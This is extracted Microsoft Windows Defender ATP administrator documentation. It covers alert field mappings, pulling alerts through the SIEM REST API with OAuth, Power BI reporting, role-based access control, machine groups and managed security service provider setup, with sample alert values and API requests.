6 FileName fileName Robocopy.exe Available for alerts

associated with a file or
process.
7 FilePath filePath C:\Windows\System32\Ro Available for alerts

bocopy.exe associated with a file or
process.
8 UserDomain sourceNtDomain contoso The domain of the user

context running the
activity, available for
behavioral based alerts.
9 UserName sourceUserName liz-bean The user context running

the activity, available for
behavioral based alerts.
10 Sha1 fileHash 5b4b3985339529be3151 Available for alerts

d331395f667e1d5b7f35 associated with a file or
process.
11 Md5 deviceCustomString5 55394b85cb5edddff551f6 Available for Windows

f3faa9d8eb Defender AV alerts.
12 Sha256 deviceCustomString6 9987474deb9f457ece2a9 Available for Windows

533a08ec173a0986fa3aa Defender AV alerts.
6ac355eeba5b622e4a43f
5
13 ThreatName eviceCustomString1 Trojan:Win32/Skeeyah.A!bi Available for Windows

t Defender AV alerts.
14 IpAddress sourceAddress 218.90.204.141 Available for alerts

associated to network
events. For example,
'Communication to a
malicious network
destination'.
15 Url requestUrl down.esales360.cn Available for alerts

associated to network
events. For example,
'Communication to a
malicious network
destination'.
16 RemediationIsSuccess deviceCustomNumber2 TRUE Available for Windows

Defender AV alerts.
ArcSight value is 1 when
TRUE and 0 when FALSE.
17 WasExecutingWhileDetect deviceCustomNumber1 FALSE Available for Windows

ed Defender AV alerts.
ArcSight value is 1 when
TRUE and 0 when FALSE.
18 AlertId externalId 636210704265059241_6 Value available for every

73569822 alert.
19 LinkToWDATP flexString1 Value available for every

https://securitycenter.windows.com/alert/636210704265059241_673569
alert.
20 AlertTime deviceReceiptTime 2017-05- The time the activity

07T01:56:59.3191352Z relevant to the alert
occurred. Value available
for every alert.
21 MachineDomain sourceDnsDomain contoso.com Domain name not

relevant for AAD joined
machines. Value available
for every alert.
22 Actor deviceCustomString4 Available for alerts related

to a known actor group.
21+5 ComputerDnsName No mapping liz-bean.contoso.com The machine fully qualified

domain name. Value
available for every alert.
LogOnUsers sourceUserId contoso\liz-bean; The domain and user of

contoso\jay-hardee the interactive logon
user/s at the time of the
event. Note: For machines
on Windows 10 version
1607, the domain
information will not be
available.
InternalIPv4List No mapping 192.168.1.7, 10.1.14.1 List of IPV4 internal IPs

for active network
interfaces.
InternalIPv6List No mapping fd30:0000:0000:0001:ff4e: List of IPV6 internal IPs

003e:0009:000e, for active network
FE80:CD00:0000:0CDE:12 interfaces.
57:0000:211E:729C
Internal field LastProcessedTimeUtc No mapping 2017-05- Time when event arrived

07T01:56:58.9936648Z at the backend. This field
can be used when setting
the request parameter for
the range of time that
alerts are retrieved.
Not part of the schema deviceVendor Static value in the

ArcSight mapping -
'Microsoft'.
Not part of the schema deviceProduct Static value in the

ArcSight mapping -
'Windows Defender ATP'.
Not part of the schema deviceVersion Static value in the

ArcSight mapping - '2.0',
used to identify the
mapping versions.
Related topics
Pull Windows Defender ATP alerts using SIEM REST API
Applies to:
Windows Defender ATP supports the OAuth 2.0 protocol to pull alerts from the portal.
In general, the OAuth 2.0 protocol supports four types of flows:
Authorization grant flow
Implicit flow
Client credentials flow
Resource owner flow
For more information about the OAuth specifications, see the OAuth Website.
Windows Defender ATP supports the Authorization grant flow and Client credential flow to obtain access to generate alerts
from the portal, with Azure Active Directory (AAD ) as the authorization server.
The Authorization grant flow uses user credentials to get an authorization code, which is then used to obtain an access token.
The Client credential flow uses client credentials to authenticate against the Windows Defender ATP endpoint URL. This flow
is suitable for scenarios when an OAuth client creates requests to an API that doesn't require user credentials.
Use the following method in the Windows Defender ATP API to pull alerts in JSON format.
NOTE
Windows Defender Security Center merges similar alert detections into a single alert. This API pulls alert detections in its raw form based
on the query parameters you set, enabling you to apply your own grouping and filtering.
Before you begin

Before calling the Windows Defender ATP endpoint to pull alerts, you'll need to enable the SIEM integration
application in Azure Active Directory (AAD ). For more information, see Enable SIEM integration in Windows Defender
ATP.
Take note of the following values in your Azure application registration. You need these values to configure the OAuth
flow in your service or daemon app:
Application ID (unique to your application)
App key, or secret (unique to your application)
Your app's OAuth 2.0 token endpoint
Find this value by clicking View Endpoints at the bottom of the Azure Management Portal in your app's
page. The endpoint will look like https://login.microsoftonline.com/{tenantId}/oauth2/token .
Get an access token

Before creating calls to the endpoint, you'll need to get an access token.
You'll use the access token to access the protected resource, which are alerts in Windows Defender ATP.
To get an access token, you'll need to do a POST request to the token issuing endpoint. Here is a sample request:
POST /72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/token HTTP/1.1
Host: login.microsoftonline.com
Content-Type: application/x-www-form-urlencoded
resource=https%3A%2F%2Fgraph.windows.net&client_id=35e0f735-5fe4-4693-9e68-
3de80f1d3745&client_secret=IKXc6PxB2eoFNJ%2FIT%2Bl2JZZD9d9032VXz6Ul3D2WyUQ%3D&grant_type=client_credentials
The response will include an access token and expiry information.
{
"token_type": "Bearer",
"expires_in": "3599",
"ext_expires_in": "0",
"expires_on": "1488720683",
"not_before": "1488720683",
"resource": "https://graph.windows.net",
"access_token":"eyJ0eXaioJJOIneiowiouqSuzNiZ345FYOVkaJL0625TueyaJasjhIjEnbMlWqP..."
}
You can now use the value in the access_token field in a request to the Windows Defender ATP API.
Request
With an access token, your app can make authenticated requests to the Windows Defender ATP API. Your app must append
the access token to the Authorization header of each request.
Request syntax
METHOD REQUEST URI
GET Use the URI applicable for your region.
For EU:
https://wdatp-alertexporter-eu.windows.com/api/alerts
For US:
https://wdatp-alertexporter-us.windows.com/api/alerts
For UK:
https://wdatp-alertexporter-uk.windows.com/api/alerts
Request header
HEADER TYPE DESCRIPTION
Authorization string Required. The Azure AD access token in the

form Bearer <token>.
Request parameters
Use optional query parameters to specify and control the amount of data returned in a response. If you call this method
without parameters, the response contains all the alerts in your organization in the last 2 hours.
DateTime?sinceTimeUtc string Defines the lower time bound alerts are

retrieved from, based on field:
LastProcessedTimeUtc
The time range will be: from sinceTimeUtc
time to current time.
NOTE: When not specified, all alerts

generated in the last two hours are
retrieved.
DateTime?untilTimeUtc string Defines the upper time bound alerts are

retrieved.
The time range will be: from sinceTimeUtc
time to untilTimeUtc time.
NOTE: When not specified, the default value

will be the current time.
string ago string Pulls alerts in the following time range: from
(current_time - ago) time to
current_time time.
Value should be set according to ISO 8601

duration format
E.g. ago=PT10M will pull alerts received in
the last 10 minutes.
int?limit int Defines the number of alerts to be

retrieved. Most recent alerts will be
retrieved based on the number defined.
NOTE: When not specified, all alerts

available in the time range will be retrieved.
machinegroups String Specifies machine groups to pull alerts from.
NOTE: When not specified, alerts from all

machine groups will be retrieved.
Example:
eu.securitycenter.windows.com/api/Alerts/?
machinegroups=UKMachines&machinegroups=FranceMachines
DeviceCreatedMachineTags string Single machine tag from the registry.
CloudCreatedMachineTags string Machine tags that were created in Windows

Defender Security Center.
Request example
The following example demonstrates how to retrieve all the alerts in your organization.
GET https://wdatp-alertexporter-eu.windows.com/api/alerts
Authorization: Bearer <your access token>
The following example demonstrates a request to get the last 20 alerts since 2016-09-12 00:00:00.
GET https://wdatp-alertexporter-eu.windows.com/api/alerts?limit=20&sinceTimeUtc=2016-09-12T00:00:00.000
Authorization: Bearer <your access token>
Response
The return value is an array of alert objects in JSON format.
Here is an example return value:
{"AlertTime":"2017-01-23T07:32:54.1861171Z",
"ComputerDnsName":"desktop-bvccckk",
"AlertTitle":"Suspicious PowerShell commandline",
"Category":"SuspiciousActivity",
"Severity":"Medium",
"AlertId":"636207535742330111_-1114309685",
"Actor":null,
"LinkToWDATP":"https://securitycenter.windows.com/alert/636207535742330111_-1114309685",
"IocName":null,
"IocValue":null,
"CreatorIocName":null,
"CreatorIocValue":null,
"Sha1":"69484ca722b4285a234896a2e31707cbedc59ef9",
"FileName":"powershell.exe",
"FilePath":"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0",
"IpAddress":null,
"Url":null,
"IoaDefinitiondId":"7f1c3609-a3ff-40e2-995b-c01770161d68",
"UserName":null,
"AlertPart":0,
"FullId":"636207535742330111_-1114309685:9DE735BA9FF87725E392C6DFBEB2AF279035CDE229FCC00D28C0F3242C5A50AF",
"LastProcessedTimeUtc":"2017-01-23T11:33:45.0760449Z",
"ThreatCategory":null,
"ThreatFamily":null,
"ThreatName":null,
"RemediationAction":null,
"RemediationIsSuccess":null,
"Source":"Windows Defender ATP",
"Md5":null,
"Sha256":null,
"WasExecutingWhileDetected":null,
"FileHash":"69484ca722b4285a234896a2e31707cbedc59ef9",
"IocUniqueId":"9DE735BA9FF87725E392C6DFBEB2AF279035CDE229FCC00D28C0F3242C5A50AF"}
Code examples
Get access token
The following code example demonstrates how to obtain an access token and call the Windows Defender ATP API.
AuthenticationContext context = new AuthenticationContext(string.Format("https://login.windows.net/{0}/oauth2",

tenantId));
ClientCredential clientCredentials = new ClientCredential(clientId, clientSecret);
AuthenticationResult authenticationResult = context.AcquireToken(resource, clientCredentials);
Use token to connect to the alerts endpoint
HttpClient httpClient = new HttpClient();

httpClient.DefaultRequestHeaders.Authorization = new AuthenticationHeaderValue(authenticationResult.AccessTokenType,
authenticationResult.AccessToken);
HttpResponseMessage response = httpClient.GetAsync("https://wdatp-alertexporter-
eu.windows.com/api/alert").GetAwaiter().GetResult();
string alertsJson = response.Content.ReadAsStringAsync().Result;
Console.WriteLine("Got alert list: {0}", alertsJson);
Error codes
The Windows Defender ATP REST API returns the following error codes caused by an invalid request.
HTTP ERROR CODE DESCRIPTION
401 Malformed request or invalid token.
403 Unauthorized exception - any of the domains is not managed by

the tenant administrator or tenant state is deleted.
HTTP ERROR CODE DESCRIPTION
500 Error in the service.
Related topics
Applies to:
You might need to troubleshoot issues while pulling alerts in your SIEM tools.
This page provides detailed steps to troubleshoot issues you might encounter.
Learn how to get a new client secret

If your client secret expires or if you've misplaced the copy provided when you were enabling the SIEM tool
application, you'll need to get a new secret.
2. Select Azure Active Directory.
4. Click App registrations. Then in the applications list, select the application:
For SIEM: https://WindowsDefenderATPSiemConnector
For Threat intelligence API: https://WindowsDefenderATPCustomerTiConnector
5. Select Keys section, then provide a key description and specify the key validity duration.
6. Click Save. The key value is displayed.
7. Copy the value and save it in a safe place.
Error when getting a refresh access token

If you encounter an error when trying to get a refresh token when using the threat intelligence API or SIEM tools,
you'll need to add reply URL for relevant application in Azure Active Directory.
2. Select Azure Active Directory.
4. Click App Registrations. Then in the applications list, select the application:
For SIEM: https://WindowsDefenderATPSiemConnector
For Threat intelligence API: https://WindowsDefenderATPCustomerTiConnector
5. Add the following URL:
For the European Union:
https://winatpmanagement-eu.securitycenter.windows.com/UserAuthenticationCallback
For the United Kingdom:
https://winatpmanagement-uk.securitycenter.windows.com/UserAuthenticationCallback
For the United States:
https://winatpmanagement-us.securitycenter.windows.com/UserAuthenticationCallback .
6. Click Save.
Error while enabling the SIEM connector application

If you encounter an error when trying to enable the SIEM connector application, check the pop-up blocker
settings of your browser. It might be blocking the new window being opened when you enable the capability.
Related topics
Create and build Power BI reports using Windows
Defender ATP data
Applies to:
IMPORTANT
TIP
Go to Advanced features in the Settings page to turn on the preview features.
Understand the security status of your organization, including the status of machines, alerts, and investigations
using the Windows Defender ATP reporting feature that integrates with Power BI.
Windows Defender ATP supports the use of Power BI data connectors to enable you to connect and access
Windows Defender ATP data using Microsoft Graph.
Data connectors integrate seamlessly in Power BI, and make it easy for power users to query, shape and combine
data to build reports and dashboards that meet the needs of your organization.
You can easily get started by:
Creating a dashboard on the Power BI service
Building a custom dashboard on Power BI Desktop and tweaking it to fit the visual analytics and reporting
requirements of your organization
You can access these options from Windows Defender Security Center. Both the Power BI service and Power BI
Desktop are supported.
Create a Windows Defender ATP dashboard on Power BI service

Windows Defender ATP makes it easy to create a Power BI dashboard by providing an option straight from the
portal.
1. In the navigation pane, select Settings > Power BI reports.
2. Click Create dashboard.
You'll see a notification that things are being loaded.
NOTE
Loading your data in the Power BI service can take a few minutes.
3. Specify the following details:

extensionDataSourceKind: WDATPConnector
extensionDataSourcePath: WDATPConnector
Authentication method: OAuth2
4. Click Sign in. If this is the first time you’re using Power BI with Windows Defender ATP, you’ll need to sign
in and give consent to Windows Defender ATP Power BI app. By providing consent, you’re allowing
Windows Defender ATP Power BI to sign in and read your profile, access your data, and be used for report
refresh.
5. Click Accept. Power BI service will start downloading your Windows Defender ATP data from Microsoft
Graph. After a successful login, you'll see a notification that data is being imported:
NOTE
Depending on the number of onboarded machines, loading your data in the Power BI service can take several
minutes. A larger number of machines might take longer to load.
When importing data is completed and the dataset is ready, you’ll the following notification:
6. Click View dataset to explore your data.

For more information, see Create a Power BI dashboard from a report.
Create a Power BI dashboard from the Power BI portal

1. Login to Power BI.
2. Click Get Data.
3. Select Microsoft AppSource > My Organization > Get.
4. In the AppSource window, select Apps and search for Windows Defender Advanced Threat Protection.
5. Click Get it now.
7. Click Sign in. If this is the first time you’re using Power BI with Windows Defender ATP, you’ll need to sign
in and give consent to Windows Defender ATP Power BI app. By providing consent, you’re allowing
refresh.
NOTE
Build a custom Windows Defender ATP dashboard in Power BI Desktop

You can create a custom dashboard in Power BI Desktop to create visualizations that cater to the specific views that
your organization requires.
Before you begin
1. Make sure you use Power BI Desktop June 2017 and above. Download the latest version.
2. In the Windows Defender Security Center navigation pane, select Settings > Power BI reports.
3. Click Download connector to download the WDATPPowerBI.zip file and extract it.
4. Create a new directory Microsoft Power BI Desktop\Custom Connectors under the user's Documents folder.
5. Copy WDATPDataConnector.mez from the zip to the directory you just created.
6. Open Power BI Desktop.
7. Click File > Options and settings > Custom data connectors.
8. Select New table and matrix visuals and Custom data connectors and click OK.
NOTE
If you are using Power BI Desktop July 2017 version (or later), you won't need to select New table and matrix
visuals. You'll only need to select Custom data connectors.
9. Restart Power BI Desktop.
Customize the Windows Defender ATP Power BI dashboard

After completing the steps in the Before you begin section, you can proceed with building your custom dashboard.
1. Open WDATPPowerBI.pbit from the zip with Power BI Desktop.
2. If this is the first time you’re using Power BI with Windows Defender ATP, you’ll need to sign in and give
consent to Windows Defender ATP Power BI app. By providing consent, you’re allowing Windows Defender
ATP Power BI to sign in and read your profile, and access your data.
3. Click Accept. Power BI Desktop will start downloading your Windows Defender ATP data from Microsoft
Graph. When all data has been downloaded, you can proceed to customize your reports.
Mashup Windows Defender ATP data with other data sources

You can use Power BI Desktop to analyse data from Windows Defender ATP and mash that data up with other data
sources to gain better security perspective in your organization.
1. In Power BI Desktop, in the Home ribbon, click Get data and search for Windows Defender Advanced
Threat Protection.
2. Click Connect.
3. On the Preview Connector windows, click Continue.
consent to Windows Defender ATP Power BI app. By providing consent, you’re allowing Windows Defender
ATP Power BI to sign in and read your profile, and access your data.
6. In the Navigator dialog box, select the Windows Defender ATP feeds you'd like to download and use in your
reports and click Load. Data will start to be downloaded from the Microsoft Graph.
7. Load other data sources by clicking Get data item in the Home ribbon, and select another data source.
8. Add visuals and select fields from the available data sources.
Using the Power BI reports

There are a couple of tabs on the report that's generated:
Machine and alerts
Investigation results and action center
Secure Score
In general, if you know of a specific threat name, CVE, or KB, you can identify machines with unpatched
vulnerabilities that might be leveraged by threats. This report also helps you determine whether machine-level
mitigations are configured correctly on the machines and prioritize those that might need attention.
Related topic
Beta Create custom Power BI reports
Threat protection report in Windows Defender ATP
Applies to:
The threat protection report provides high-level information about alerts generated in your organization. The
report includes trending information showing the detection sources, categories, severities, statuses, classifications,
and determinations of alerts across time.
The dashboard is structured into two sections:
SECTION DESCRIPTION
1 Alerts trends
2 Alert summary
By default, the alert trends display alert information from the 30-day period ending in the latest full day. To gain
better perspective on trends occurring in your organization, you can fine-tune the reporting period by adjusting the
time period shown. To adjust the time period, select a time range from the drop-down options:
30 days
3 months
6 months
Custom
While the alert trends shows trending alert information, the alert summary shows alert information scoped to the
current day.
The alert summary allows you to drill down to a particular alert queue with the corresponding filter applied to it.
For example, clicking on the EDR bar in the Detection sources card will bring you the alerts queue with results
showing only alerts generated from EDR detections.
Alert attributes
The report is made up of cards that display the following alert attributes:
Detection sources: shows information about the sensors and detection technologies that provide the data
used by Windows Defender ATP to trigger alerts.
Threat categories: shows the types of threat or attack activity that triggered alerts, indicating possible
focus areas for your security operations.
Severity: shows the severity level of alerts, indicating the collective potential impact of threats to your
organization and the level of response needed to address them.
Status: shows the resolution status of alerts, indicating the efficiency of your manual alert responses and of
automated remediation (if enabled).
Classification & determination: shows how you have classified alerts upon resolution, whether you have
classified them as actual threats (true alerts) or as incorrect detections (false alerts). These cards also show
the determination of resolved alerts, providing additional insight like the types of actual threats found or the
legitimate activities that were incorrectly detected.
Filter data
Use the provided filters to include or exclude alerts with certain attributes.
NOTE
These filters apply to all the cards in the report.
For example, to show data about high-severity alerts only:

1. Under Filters > Severity, select High
2. Ensure that all other options under Severity are deselected.
3. Select Apply.
Related topic
Machine health and compliance report
Machine health and compliance report in Windows
Defender ATP
Applies to:
IMPORTANT
The machines status report provides high-level information about the devices in your organization. The report
includes trending information showing the sensor health state, antivirus status, OS platforms, and Windows 10
versions.
The dashboard is structured into two sections:
SECTION DESCRIPTION
1 Machine trends
2 Machine summary (current day)
By default, the machine trends displays machine information from the 30-day period ending in the latest full day.
To gain better perspective on trends occurring in your organization, you can fine-tune the reporting period by
adjusting the time period shown. To adjust the time period, select a time range from the drop-down options:
30 days
3 months
6 months
Custom
While the machines trends shows trending machine information, the machine summary shows machine
information scoped to the current day.
The machine trends section allows you to drill down to the machines list with the corresponding filter applied to it.
For example, clicking on the Inactive bar in the Sensor health state card will bring you the machines list with results
showing only machines whose sensor status is inactive.
Machine attributes
The report is made up of cards that display the following machine attributes:
Health state: shows information about the sensor state on devices, providing an aggregated view of
devices that are active, experiencing impaired communications, inactive, or where no sensor data is seen.
Antivirus status for active Windows 10 machines: shows the number of machines and status of
Windows Defender Antivirus.
OS platforms: shows the distribution of OS platforms that exists within your organization.
Windows 10 versions: shows the distribution of Windows 10 machines and their versions in your
organization.
Filter data
Use the provided filters to include or exclude machines with certain attributes.
You can select multiple filters to apply from the machine attributes.
NOTE
These filters apply to all the cards in the report.
For example, to show data about Windows 10 machines with Active sensor health state:
1. Under Filters > Sensor health state > Active.
2. Then select OS platforms > Windows 10.
3. Select Apply.
Related topic
Threat protection report
Partner applications in Microsoft Defender ATP
Applies to:
Microsoft Defender Advanced Threat Protection (Windows Defender ATP )
Microsoft Defender ATP supports third-party applications to help enhance the detection, investigation, and threat
intelligence capabilities of the platform.
The support for third-party solutions help to further streamline, integrate, and orchestrate defenses from other
vendors with Microsoft Defender ATP; enabling security teams to effectively respond better to modern threats.
Microsoft Defender ATP seamlessly integrates with existing security solutions - providing out of the box integration
with SIEM, ticketing and IT service management solutions, managed security service providers (MSSP ), IoC
indicators ingestions and matching, automated device investigation and remediation based on external alerts, and
integration with Security orchestration and automation response (SOAR ) systems.
SIEM integration
Microsoft Defender ATP supports SIEM integration through a variety of methods - specialized SIEM system
interface with out of the box connectors, a generic alert API enabling custom implementations, and an action API
enabling alert status management. For more information, see Enable SIEM integration.
Ticketing and IT service management

Ticketing solution integration helps to implement manual and automatic response processes. Microsoft Defender
ATP can help to create tickets automatically when an alert is generated and resolve the alerts when tickets are
closed using the alerts API.
Security orchestration and automation response (SOAR) integration

Orchestration solutions can help build playbooks and integrate the rich data model and actions that Microsoft
Defender ATP APIs expose to orchestrate responses, such as query for device data, trigger machine isolation,
block/allow, resolve alert and others.
External alert correlation and Automated investigation and remediation

Microsoft Defender ATP offers unique automated investigation and remediation capabilities to drive incident
response at scale.
Integrating the automated investigation and response capability with other solutions such as IDS and firewalls help
to address alerts and minimize the complexities surrounding network and device signal correlation, effectively
streamlining the investigation and threat remediation actions on devices.
External alerts can be pushed into Microsoft Defender ATP and is presented side-by-side with additional device-
based alerts from Microsoft Defender ATP. This view provides a full context of the alert - with the real process and
the full story of attack.
Indicators matching
You can use threat-intelligence from providers and aggregators to maintain and use indicators of compromise
(IOCs).
Microsoft Defender ATP allows you to integrate with such solutions and act on IoCs by correlating its rich
telemetry and creating alerts when there's a match; leveraging prevention and automated response capabilities to
block execution and take remediation actions when there's a match.
Microsoft Defender ATP currently supports IOC matching and remediation for file and network indicators.
Blocking is supported for file indicators.
Support for non-Windows platforms

Microsoft Defender ATP provides a centralized security operations experience for Windows as well as non-
Windows platforms. You'll be able to see alerts from various supported operating systems (OS ) in the portal and
better protect your organization's network. This experience leverages on a third-party security products' sensor
data giving you a unified experience.
Manage portal access using role-based access control
Applies to:
Office 365
Using role-based access control (RBAC ), you can create roles and groups within your security operations team to
grant appropriate access to the portal. Based on the roles and groups you create, you have fine-grained control
over what users with access to the portal can see and do.
Large geo-distributed security operations teams typically adopt a tier-based model to assign and authorize access
to security portals. Typical tiers include the following three levels:
TIER DESCRIPTION
Tier 1 Local security operations team / IT team

This team usually triages and investigates alerts contained
within their geolocation and escalates to Tier 2 in cases where
an active remediation is required.
Tier 2 Regional security operations team

This team can see all the machines for their region and
perform remediation actions.
Tier 3 Global security operations team

This team consists of security experts and are authorized to
see and perform all actions from the portal.
Windows Defender ATP RBAC is designed to support your tier- or role-based model of choice and gives you
granular control over what roles can see, machines they can access, and actions they can take. The RBAC
framework is centered around the following controls:
Control who can take specific action
Create custom roles and control what Windows Defender ATP capabilities they can access with
granularity.
Control who can see information on specific machine group or groups
Create machine groups by specific criteria such as names, tags, domains, and others, then grant role
access to them using a specific Azure Active Directory (Azure AD ) user group.
To implement role-based access, you'll need to define admin roles, assign corresponding permissions, and assign
Azure AD user groups assigned to the roles.
Before you begin
Before using RBAC, it's important that you understand the roles that can grant permissions and the consequences
of turning on RBAC.
WARNING
Before enabling the feature, it's important that you have a Global Administrator role or Security Administrator role in Azure
AD and that you have your Azure AD groups ready to reduce the risk of being locked out of the portal.
When you first log in to Windows Defender Security Center, you're granted either full access or read only access.
Full access rights are granted to users with Security Administrator or Global Administrator roles in Azure AD. Read
only access is granted to users with a Security Reader role in Azure AD.
Someone with a Windows Defender ATP Global administrator role has unrestricted access to all machines,
regardless of their machine group association and the Azure AD user groups assignments
WARNING
Initially, only those with Azure AD Global Administrator or Security Administrator rights will be able to create and assign roles
in Windows Defender Security Center, therefore, having the right groups ready in Azure AD is important.
Turning on role-based access control will cause users with read-only permissions (for example, users assigned to
Azure AD Security reader role) to lose access until they are assigned to a role.
Users with admin permissions are automatically assigned the default built-in Windows Defender ATP global administrator role
with full permissions. After opting in to use RBAC, you can assign additional users that are not Azure AD Global or Security
Administrators to the Windows Defender ATP global administrator role.
After opting in to use RBAC, you cannot revert to the initial roles as when you first logged into the portal.
Related topic
Create and manage machine groups in Windows Defender ATP
Create and manage roles for role-based access
control
Applies to:
Create roles and assign the role to an Azure Active Directory group
The following steps guide you on how to create roles in Windows Defender Security Center. It assumes that you
have already created Azure Active Directory user groups.
1. In the navigation pane, select Settings > Roles.
2. Click Add role.
3. Enter the role name, description, and permissions you'd like to assign to the role.
Role name
Description
Permissions
View data - Users can view information in the portal.
Alerts investigation - Users can manage alerts, initiate automated investigations, collect
investigation packages, manage machine tags, and export machine timeline.
Active remediation actions - Users can take response actions and approve or dismiss pending
remediation actions.
Manage portal system settings - Users can configure storage settings, SIEM and threat intel
API settings (applies globally), advanced settings, automated file uploads, roles and machine
groups.
NOTE
This setting is only available in the Windows Defender ATP administrator (default) role.
Manage security settings - Users can configure alert suppression settings, manage
allowed/blocked lists for automation, manage folder exclusions for automation, onboard and
offboard machines, and manage email notifications.
4. Click Next to assign the role to an Azure AD group.
5. Use the filter to select the Azure AD group that you'd like to add to this role.
7. Apply the configuration settings.
After creating roles, you'll need to create a machine group and provide access to the machine group by assigning it
to a role that you just created.
Edit roles
1. Select the role you'd like to edit.
2. Click Edit.
3. Modify the details or the groups that are assigned to the role.
Delete roles
1. Select the role you'd like to delete.
2. Click the drop-down button and select Delete role.
Related topic
User basic permissions to access the portal
Create and manage machine groups
Create and manage machine groups in Windows
Defender ATP
Applies to:
Office 365
In an enterprise scenario, security operation teams are typically assigned a set of machines. These machines are
grouped together based on a set of attributes such as their domains, computer names, or designated tags.
In Windows Defender ATP, you can create machine groups and use them to:
Limit access to related alerts and data to specific Azure AD user groups with assigned RBAC roles
Configure different auto-remediation settings for different sets of machines
TIP
For a comprehensive look into RBAC application, read: Is your SOC running flat with RBAC.
As part of the process of creating a machine group, you'll:

Set the automated remediation level for that group. For more information on remediation levels, see Use
Automated investigation to investigate and remediate threats.
Specify the matching rule that determines which machine group belongs to the group based on the machine
name, domain, tags, and OS platform. If a machine is also matched to other groups, it is added only to the
highest ranked machine group.
Select the Azure AD user group that should have access to the machine group.
Rank the machine group relative to other groups after it is created.
NOTE
A machine group is accessible to all users if you don’t assign any Azure AD groups to it.
Create a machine group

1. In the navigation pane, select Settings > Machine groups.
2. Click Add machine group.
3. Enter the group name and automation settings and specify the matching rule that determines which
machines belong to the group.
Machine group name
Automation level
Semi - require approval for any remediation
Semi - require approval for non-temp folders remediation
Semi - require approval for core folders remediation
Full - remediate threats automatically
NOTE
For more information on automation levels, see Understand the Automated investigation flow.
Description
Members
TIP
If you want to group machines by organizational unit, you can configure the registry key for the group affiliation. For
more information on device tagging, see Manage machine group and tags.
4. Preview several machines that will be matched by this rule. If you are satisfied with the rule, click the Access
tab.
5. Assign the user groups that can access the machine group you created.
NOTE
You can only grant access to Azure AD user groups that have been assigned to RBAC roles.
6. Click Close. The configuration changes are applied.
Manage machine groups

You can promote or demote the rank of a machine group so that it is given higher or lower priority during
matching. When a machine is matched to more than one group, it is added only to the highest ranked group. You
can also edit and delete groups.
WARNING
Deleting a machine group may affect email notification rules. If a machine group is configured under an email notification rule,
it will be removed from that rule. If the machine group is the only group configured for an email notification, that email
notification rule will be deleted along with the machine group.
By default, machine groups are accessible to all users with portal access. You can change the default behavior by
assigning Azure AD user groups to the machine group.
Machines that are not matched to any groups are added to Ungrouped machines (default) group. You cannot
change the rank of this group or delete it. However, you can change the remediation level of this group, and define
the Azure AD user groups that can access this group.
NOTE
Applying changes to machine group configuration may take up to several minutes.
Related topic
Manage portal access using role-based based access control
Get list of tenant machine groups using Graph API
You can create machine groups in the context of role-based access (RBAC ) to control who can take specific action or
who can see information on a specific machine group or groups by assigning the machine group to a user group.
For more information, see Manage portal access using role-based access control.
By using the portal

NOTE
Windows Server 2016
NOTE

following views:
section.
Manage machine tags
Configure managed security service provider
integration
Applies to:
IMPORTANT
You'll need to take the following configuration steps to enable the managed security service provider (MSSP )
integration.
NOTE
The following terms are used in this article to distinguish between the service provider and service consumer:
MSSPs: Security organizations that offer to monitor and manage security devices for an organization.
MSSP customers: Organizations that engage the services of MSSPs.
The integration will allow MSSPs to take the following actions:

Get access to MSSP customer's Windows Defender Security Center portal
Get email notifications, and
Fetch alerts through security information and event management (SIEM ) tools
Before MSSPs can take these actions, the MSSP customer will need to grant access to their Windows Defender
ATP tenant so that the MSSP can access the portal.
Typically, MSSP customers take the initial configuration steps to grant MSSPs access to their Windows Defender
Security Central tenant. After access is granted, other configuration steps can be done by either the MSSP
customer or the MSSP.
In general, the following configuration steps need to be taken:
Grant the MSSP access to Windows Defender Security Center
This action needs to be done by the MSSP customer. It grants the MSSP access to the MSSP customer's
Windows Defender ATP tenant.
Configure alert notifications sent to MSSPs
This action can be taken by either the MSSP customer or MSSP. This lets the MSSPs know what alerts they
need to address for the MSSP customer.
Fetch alerts from MSSP customer's tenant into SIEM system
This action is taken by the MSSP. It allows MSSPs to fetch alerts in SIEM tools.
Fetch alerts from MSSP customer's tenant using APIs
This action is taken by the MSSP. It allows MSSPs to fetch alerts using APIs.
Grant the MSSP access to the portal

NOTE
These set of steps are directed towards the MSSP customer.
Access to the portal can only be done by the MSSP customer.
As a MSSP customer, you'll need to take the following configuration steps to grant the MSSP access to Windows
Defender Security Center.
Authentication and authorization of the MSSP user is built on top of Azure Active Directory (Azure AD ) B2B
functionality.
You'll need to take the following 2 steps:
Add MSSP user to your tenant as a guest user
Grant MSSP user access to Windows Defender Security Center
Add MSSP user to your tenant as a guest user
Add a user who is a member of the MSSP tenant to your tenant as a guest user.
To grant portal access to the MSSP, you must add the MSSP user to your Azure AD as a guest user. For more
information, see Add Azure Active Directory B2B collaboration users in the Azure portal.
Grant MSSP user access to Windows Defender Security Center
Grant the guest user access and permissions to your Windows Defender Security Center tenant.
Granting access to guest user is done the same way as granting access to a user who is a member of your tenant.
If you're using basic permissions to access the portal, the guest user must be assigned a Security Administrator
role in your tenant. For more information, see Use basic permissions to access the portal.
If you're using role-based access control (RBAC ), the guest user must be to added to the appropriate group or
groups in your tenant. Fore more information on RBAC in Windows Defender ATP, see Manage portal access
using RBAC.
NOTE
There is no difference between the Member user and Guest user roles from RBAC perspective.
It is recommended that groups are created for MSSPs to make authorization access more manageable.
As a MSSP customer, you can always remove or modify the permissions granted to the MSSP by updating the
Azure AD user groups.
Access the Windows Defender Security Center MSSP customer portal

NOTE
These set of steps are directed towards the MSSP.
By default, MSSP customers access their Windows Defender Security Center tenant through the following URL:
https://securitycenter.windows.com .
MSSPs however, will need to use a tenant-specific URL in the following format:
https://securitycenter.windows.com?tid=customer_tenant_id to access the MSSP customer portal.
In general, MSSPs will need to be added to each of the MSSP customer's Azure AD that they intend to manage.
Use the following steps to obtain the MSSP customer tenant ID and then use the ID to access the tenant-specific
URL:
1. As an MSSP, login to Azure AD with your credentials.
2. Switch directory to the MSSP customer's tenant.
3. Select Azure Active Directory > Properties. You'll find the tenant ID in the Directory ID field.
4. Access the MSSP customer portal by replacing the customer_tenant_id value in the following URL:
https://securitycenter.windows.com?tid=customer_tenant_id .
Configure alert notifications that are sent to MSSPs

NOTE
This step can be done by either the MSSP customer or MSSP. MSSPs must be granted the appropriate permissions to
configure this on behalf of the MSSP customer.
After access the portal is granted, alert notification rules can to be created so that emails are sent to MSSPs when
alerts associated with the tenant are created and set conditions are met.
For more information, see Create rules for alert notifications.
These check boxes must be checked:
Include organization name - The customer name will be added to email notifications
